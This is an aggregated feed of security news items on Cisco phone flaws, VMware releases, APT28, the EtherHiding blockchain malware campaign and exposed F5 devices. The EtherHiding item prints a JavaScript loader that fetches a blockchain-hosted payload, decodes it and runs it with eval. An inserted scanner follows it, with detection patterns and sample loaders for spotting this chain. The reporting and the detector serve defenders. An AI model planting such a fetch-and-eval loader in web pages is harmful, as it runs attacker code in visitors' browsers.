• Cisco has issued a security advisory warning of multiple vulnerabilities in its Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 models running Cisco Session Initiation Protocol (SIP) Software.

    Published on October 15, 2025, the advisory details risks that could enable unauthenticated remote attackers to trigger denial-of-service (DoS) conditions or cross-site scripting (XSS) attacks via the devices’ web user interface.

    These flaws affect phones registered to Cisco Unified Communications Manager (CUCM) with Web Access enabled, a feature disabled by default to minimize exposure.

    DoS Vulnerability Poses High Risk To Device Stability

    The primary concern is CVE-2025-20350, a high-severity buffer overflow flaw rated at a CVSS 3.1 score of 7.5. This vulnerability arises when affected devices process crafted HTTP packets, potentially causing the phone to reload and disrupt operations.

    Attackers need no privileges and can exploit it over the network with low complexity, leading to the temporary unavailability of communication services.

    Cisco links this to several bug IDs, including CSCwn51601, emphasizing its impact on enterprise telephony environments. A secondary issue, CVE-2025-20351, introduces a medium-severity XSS vulnerability with a CVSS score of 6.1.

    Due to inadequate input validation in the web UI, attackers can inject malicious scripts by tricking users into clicking crafted links.

    Successful exploitation could steal session data or manipulate the interface, though it requires user interaction. Associated bugs include CSCwn51683, highlighting persistent weaknesses in web handling.

According to the advisory, the vulnerabilities affect specific Cisco SIP Software releases across the phone series listed above; phones running Multiplatform Firmware are not affected.

Exploitation requires both that Web Access be enabled and that the phone be registered to CUCM, conditions not met in default configurations. No public exploits or malicious uses have been reported, but organizations that have enabled the web feature face elevated risk in their unified communications networks.

    Mitigations

Cisco provides no workaround beyond disabling Web Access, which can be done through CUCM administration or the Bulk Administration Tool; administrators can verify the setting by browsing to the phone’s IP address.

    Fixed releases include SIP Software 3.3(1) for Desk Phone 9800 and Video Phone 8875, 14.3(1)SR2 for IP Phone 7800/8800, and 11.0(6)SR7 for IP Phone 8821.

    Users should upgrade promptly to avert potential disruptions, as these patches fully address the flaws without impacting core functionality.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Cisco Desk, IP, and Video Phone Vulnerabilities Let Remote Attackers Trigger DoS And XSS Attacks appeared first on Cyber Security News.


  • Cybersecurity researchers have disclosed details of a recently patched critical security flaw in WatchGuard Fireware that could allow unauthenticated attackers to execute arbitrary code. The vulnerability, tracked as CVE-2025-9242 (CVSS score: 9.3), is described as an out-of-bounds write vulnerability affecting Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including


  • Cybercriminals are weaponizing artificial intelligence to accelerate malware development, discover vulnerabilities faster, and create more sophisticated phishing campaigns, according to Microsoft’s latest Digital Defense Report covering trends from July 2024 through June 2025. In 80% of the cyber incidents Microsoft investigated last year, attackers sought to steal data primarily for profit rather than intelligence gathering. […]

    The post Microsoft Report Warns of AI-Powered Automation in Cyberattacks and Malware Creation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • ConnectWise has issued a critical security update for its Automate™ platform after uncovering vulnerabilities that could allow attackers to intercept and tamper with software updates. The flaws, present in on-premises installations configured to use unsecured communication channels, put organizations at risk of deploying malicious code under the guise of routine patches. ConnectWise Automate 2025.9, released […]

    The post ConnectWise Flaws Let Attackers Deliver Malicious Software Updates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Multiple Cisco desk, IP, and video phones are at risk of remote denial-of-service (DoS) and cross-site scripting (XSS) attacks due to flaws in their Session Initiation Protocol (SIP) software. The weaknesses affect Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 models when they are registered to Cisco Unified Communications […]

    The post Cisco Desk, IP, and Video Phones Vulnerable to Remote DoS and XSS Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • VMware has launched Workstation 25H2 and Fusion 25H2, the newest iterations of its desktop hypervisors, featuring a revamped versioning system, enhanced tools, and broader compatibility with modern hardware and operating systems.

    These updates aim to streamline virtualization for developers, IT professionals, and testers by improving performance, automation, and support for cutting-edge platforms.

    The releases introduce a calendar-based naming convention, shifting from sequential numbers like 17.6.x or 13.6.x to 25H2, denoting the second half of 2025.

    This model simplifies release tracking, upgrade planning, and consistency across VMware’s product lineup, making it easier for users to stay current with updates.

    By aligning versions with time periods, VMware ensures clearer communication about publication dates and feature rollouts.

    Key Feature Enhancements

    Several new capabilities target automation and usability. The dictTool command-line utility now allows inspection and editing of .vmx configuration files and user preferences, fulfilling community requests for advanced scripting and customization options.

    USB 3.2 support accelerates data transfers and boosts compatibility with contemporary peripherals across both products. Hardware Version 22 enables virtual machines to leverage the latest virtual hardware for superior performance and feature access.

    Workstation exclusively adds Hyper-V/WHP detection, displaying the VM’s running mode for better troubleshooting on Windows hosts.

    Support for new CPUs and operating systems addresses the demands of evolving workloads. Workstation now accommodates Intel’s Lunar Lake, Arrow Lake, and Meteor Lake processors, enhancing host performance on recent hardware.

    Guest OS additions include Red Hat Enterprise Linux 10, Fedora Linux 42, openSUSE Leap 16.0 (RC), SUSE Linux 16 (Beta), Debian 13, Oracle Linux 10, VMware ESXi 9.0 (general for Workstation, Intel-only for Fusion), and macOS Tahoe (Intel-only for Fusion).

    Host OS expansions cover RHEL 10, Fedora 42, openSUSE Leap 16.0 (RC), SUSE Linux 16 (Beta), and Debian 13 for Workstation, while Fusion supports macOS Tahoe on both Intel and Apple Silicon systems.

    These updates ensure seamless virtualization of emerging technologies without compatibility hurdles.

    Bug Fixes And Security Improvements

    The 25H2 versions incorporate numerous refinements for stability and security. Security patches address vulnerabilities in both Workstation and Fusion, bolstering protection against potential threats.

    Accessibility improvements enhance interface navigation for diverse users. Workstation fixes include resolving Windows UI resizing issues, optimizing Linux support bundles, curbing excessive vmauthd logging in Event Viewer, adding VM suspend state discard options, and correcting Linux full-screen crashes, plus Intel GPU 3D acceleration problems.

    Fusion resolves dead key input glitches and ensures USB “Plug in Action” settings persist reliably. These changes tackle common pain points, improving overall reliability.

    Workstation Pro and Fusion Pro 25H2 launch in English, French, Japanese, and Spanish, broadening accessibility worldwide.

    Building on the free model introduced earlier, VMware expands its Customer FAQ at vmware.com/docs/desktop-hypervisor-faqs, covering community queries and direct feedback for quick resolutions.

    Downloads require registration via the official VMware site, with ongoing updates promised to maintain relevance. This release solidifies VMware’s commitment to robust desktop virtualization amid rapid tech advancements.


    The post VMware Workstation and Fusion 25H2 Released with New Features and Latest OS Support appeared first on Cyber Security News.


  • Security researchers at Sekoia.io have uncovered a sophisticated cyberattack campaign orchestrated by APT28, the notorious Russian state-sponsored threat actor, targeting Ukrainian military personnel with weaponized Office documents that deliver advanced malware frameworks including BeardShell and Covenant modules. The operation represents a significant evolution in APT28’s tactics, leveraging legitimate cloud infrastructure and novel obfuscation techniques to […]

    The post APT28 Deploys BeardShell and Covenant Modules via Weaponized Office Documents appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In recent months, a sophisticated malware campaign—dubbed EtherHiding—has emerged from North Korea-aligned threat actors, sharply escalating the cybersecurity risks facing cryptocurrency exchanges and their users worldwide.

    The campaign surfaced in the wake of heightened regulatory crackdowns on illicit crypto transactions, with attackers shifting tactics to exploit new digital supply chain vulnerabilities.

    EtherHiding first appeared in targeted phishing campaigns, but has since evolved into a multi-stage threat, marked by its use of decentralized blockchain technologies to distribute and update malicious payloads stealthily.

    The signature tactic distinguishing EtherHiding lies in its exploitation of the Binance Smart Chain (BSC) to host intermediary scripts, thereby circumventing traditional security controls and enabling the campaign to persist even after domains or hosting providers are taken down.

    Attackers compromise legitimate or semi-legitimate websites, injecting code that reaches out to blockchain-stored content to fetch the latest stage of malware.

    This modular approach grants the operators a high degree of agility, allowing on-the-fly updates to malicious scripts and reducing the effectiveness of traditional blocklists or take-down requests.

    Google Cloud researchers identified and documented EtherHiding’s operation, highlighting its innovative use of cryptographic anonymity provided by blockchain networks, making forensic tracking and operational disruption significantly more challenging for defenders.

    The impact of EtherHiding has been severe, enabling not only the theft of digital assets but also establishing persistent access to infected systems for further espionage or ransomware activity.

    As the campaign evolved, it began to target browser extensions, hot wallets, and even popular DeFi platforms, broadening the spectrum of potential victims.

    The campaign’s ability to iterate and redeploy new infection chains has frustrated enterprise defenders, with many legacy endpoint security solutions failing to keep pace with the dynamic delivery infrastructure leveraged by North Korean operators.

[Figure: UNC5342 EtherHiding on BNB Smart Chain and Ethereum (Source: Google Cloud)]

    Cryptocurrency platforms are under renewed pressure to audit their web and cloud assets, as even a minor misconfiguration can open pathways for EtherHiding’s injection and subsequent exploitation.

    Infection Mechanism and JavaScript Payloads

    The infection chain typically begins with JavaScript injected into vulnerable web properties. This script silently loads additional code from the Binance Smart Chain using unique transaction identifiers.

    The payload mechanism relies on obfuscation and multi-layer encoding, making static detection increasingly difficult.

    For instance, base64-encoded loader scripts are fetched and then executed within the browser context, occasionally using iframes or manipulated event handlers to deliver the next stage payload.

A representative code snippet demonstrates the loader’s logic:

    // Query the BSC data-seed endpoint referenced in the article
    fetch('https://bsc-dataseed.binance.org/')
      .then(response => response.json())
      .then(data => {
        // base64-decode the blockchain-stored payload ...
        let scriptContent = atob(data.result);
        // ... and execute it in the page context
        eval(scriptContent);
      });

    Such tactics not only obscure the origin of the malicious payload but also enable rapid code updates.

    As detection mechanisms adapt, EtherHiding operators push new payloads to the blockchain, decoupling the infection infrastructure from easy takedown and providing a resilient attack platform for ongoing theft and intrusion operations.
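The loader chain described above (fetch from a blockchain RPC endpoint, base64-decode the response, execute it with eval or new Function, sometimes with an iframe or event-handler stage) is simple enough to flag statically. The following is an added example, not code from the article or from Google Cloud: a heuristic scanner a site owner can run over the inline scripts of their own pages to surface that chain. The host patterns beyond the article’s bsc-dataseed endpoint, the JSON-RPC method names used as a secondary signal, and all sample scripts are assumptions constructed for this example.

```javascript
// Heuristic scanner for the EtherHiding-style loader chain (added example; constructed data).
// Hosts treated as blockchain RPC / data-seed endpoints. The first pattern is the
// endpoint from the article's snippet; the second is an assumed generic pattern.
const RPC_HOST_PATTERNS = [
  /bsc-dataseed\d*\.binance\.org/i,
  /\b(rpc|dataseed)[\w-]*\.[\w.-]+/i,
];

// Standard Ethereum JSON-RPC read methods; treating them as a signal is an assumption.
const CHAIN_READ_METHODS = ['eth_call', 'eth_getTransactionByHash', 'eth_getStorageAt'];

// Pull http(s) URL literals out of a script body.
function extractUrls(script) {
  return script.match(/https?:\/\/[^\s'"`)]+/g) || [];
}

// Return the list of indicators present in one script body.
function findIndicators(script) {
  const indicators = [];
  const urls = extractUrls(script);
  if (urls.some(u => RPC_HOST_PATTERNS.some(p => p.test(u)))) indicators.push('rpc_endpoint_fetch');
  if (CHAIN_READ_METHODS.some(m => script.includes(m))) indicators.push('chain_read_method');
  if (/\batob\s*\(/.test(script)) indicators.push('base64_decode');
  if (/\beval\s*\(|new\s+Function\s*\(/.test(script)) indicators.push('dynamic_eval');
  if (/createElement\s*\(\s*['"`]iframe['"`]\s*\)/.test(script)) indicators.push('iframe_injection');
  if (/\.on(load|error|mouseover)\s*=/.test(script)) indicators.push('event_handler_hook');
  return indicators;
}

// Verdict: the full chain (RPC fetch -> decode -> eval) is what the article describes;
// eval combined with only one of the other two is flagged as suspicious for review.
function classify(script) {
  const indicators = findIndicators(script);
  const core = ['rpc_endpoint_fetch', 'base64_decode', 'dynamic_eval'];
  let verdict = 'benign';
  if (core.every(i => indicators.includes(i))) verdict = 'likely_etherhiding_loader';
  else if (indicators.includes('dynamic_eval') &&
           (indicators.includes('base64_decode') || indicators.includes('rpc_endpoint_fetch'))) verdict = 'suspicious';
  return { verdict, indicators };
}

// Constructed sample scripts so the scanner runs stand-alone.
const SAMPLES = {
  // Mirrors the loader shape shown in the article.
  loader: `fetch('https://bsc-dataseed.binance.org/')
    .then(r => r.json())
    .then(d => { let s = atob(d.result); eval(s); });`,
  // Same idea with a JSON-RPC read call and an iframe stage.
  loaderIframe: `fetch('https://bsc-dataseed1.binance.org/', {method: 'POST',
    body: JSON.stringify({jsonrpc: '2.0', method: 'eth_call', params: [], id: 1})})
    .then(r => r.json()).then(d => {
      const f = document.createElement('iframe'); document.body.appendChild(f);
      new Function(atob(d.result))(); });`,
  // Ordinary tag loader: no decode, no eval.
  analytics: `const s = document.createElement('script');
    s.src = 'https://cdn.example.com/analytics.js'; document.head.appendChild(s);`,
  // Legitimate base64 use without execution.
  decodeOnly: `const cfg = JSON.parse(atob(document.body.dataset.cfg));`,
};

// Scan every sample and return a name -> verdict map.
function scanAll(samples = SAMPLES) {
  const out = {};
  for (const [name, body] of Object.entries(samples)) out[name] = classify(body);
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanAll(), null, 2));
}
```

The scanner is deliberately conservative: base64 decoding or an RPC fetch alone is common in legitimate code, so only the complete chain is labelled as a likely loader, and partial matches are handed to a reviewer rather than blocked.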


    The post North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency appeared first on Cyber Security News.


  • Over 269,000 F5 devices are reportedly exposed to the public internet daily, according to data from The Shadowserver Foundation.

    This exposure comes at a critical time following F5’s disclosure of a sophisticated nation-state attack that compromised its development environment, stealing source code and details on undisclosed vulnerabilities in BIG-IP products.

    Nearly half of these exposed IPs, around 134,000, are located in the United States, raising alarms for organizations worldwide relying on F5’s application delivery controllers for secure network operations.

    The breach, detected in August 2024 but involving long-term unauthorized access, underscores the vulnerabilities in F5’s infrastructure that could now amplify risks for exposed devices.

    Cybersecurity experts warn that the stolen information may enable attackers to craft targeted exploits, potentially leading to remote code execution or data exfiltration on unpatched systems.

    As federal agencies like CISA issue emergency directives, the sheer volume of internet-facing F5 hardware amplifies the threat landscape for enterprises in finance, government, and critical infrastructure sectors.

    F5 Networks confirmed on October 15, 2025, that advanced persistent threat actors had infiltrated its BIG-IP development systems, exfiltrating proprietary source code and vulnerability data not yet publicly disclosed or patched.

    This incident, described by F5 as involving “highly sophisticated” nation-state hackers, targeted engineering platforms and could compromise the integrity of future product releases.

    No direct evidence points to customer networks being breached yet, but the access to undisclosed flaws, potentially zero-days, heightens the urgency for immediate inventorying and updating of all BIG-IP instances.

    CISA’s Emergency Directive 26-01 mandates federal agencies to harden public-facing F5 devices and remove unsupported hardware, signaling the breach’s national security implications.

    The compromise affects products like BIG-IP iSeries, rSeries, F5OS-A, and BIG-IQ, with recent quarterly patches addressing related CVEs such as CVE-2025-61955 and CVE-2025-60013.

    F5 Devices Exposed Online

    Security firms like Sophos and Tenable emphasize monitoring for exploitation attempts, noting the potential for credential theft and lateral movement in affected environments.

    The Shadowserver Foundation’s Device Identification Report highlights the scale of the problem, scanning and identifying approximately 269,000 F5 device IPs daily accessible from the internet, with device_vendor filtered to F5.

    This data, shared via public reports, reveals a geographical concentration: the US dominates with 134,000 exposures, followed by countries like Japan, China, Germany, and the UK.

    Such visibility makes these devices prime targets for scanning and exploitation, especially post-breach when attackers may leverage stolen insights for precision strikes.

    Experts from organizations like Eclypsium stress that exposed iControl REST APIs, a common misconfiguration in F5 setups, have historically led to unauthenticated access vulnerabilities.

    With the recent theft of flaw details, unpatched or internet-facing BIG-IP systems face elevated risks of denial-of-service, buffer overflows, or full system takeover.

    Organizations must act swiftly by applying F5’s October 2025 security notifications, which include fixes for multiple modules in BIG-IP and F5OS platforms.

    The Shadowserver report provides daily IP feeds for proactive scanning, urging users to cross-reference with internal logs for indicators of compromise.

    As the F5 incident unfolds, this mass exposure serves as a clarion call for robust network segmentation and regular vulnerability assessments.

    With nation-state actors in play, the cybersecurity community anticipates increased exploit activity, making device visibility and rapid patching non-negotiable for global defenders.


    The post Over 269,000 F5 Devices Exposed Online After Major Breach: U.S. Faces Largest Risk appeared first on Cyber Security News.


  • A recent breach of F5 Networks’ infrastructure has left more than 269,000 devices exposed and vulnerable to attack. Security researchers first detected unusual activity on F5’s management portal, prompting the company to issue an alert and patch critical vulnerabilities. However, despite swift action, a daily snapshot from Shadowserver shows that nearly 269,000 unique IP addresses […]

    The post Over 269,000 F5 Devices Found Exposed Online After Massive Breach appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
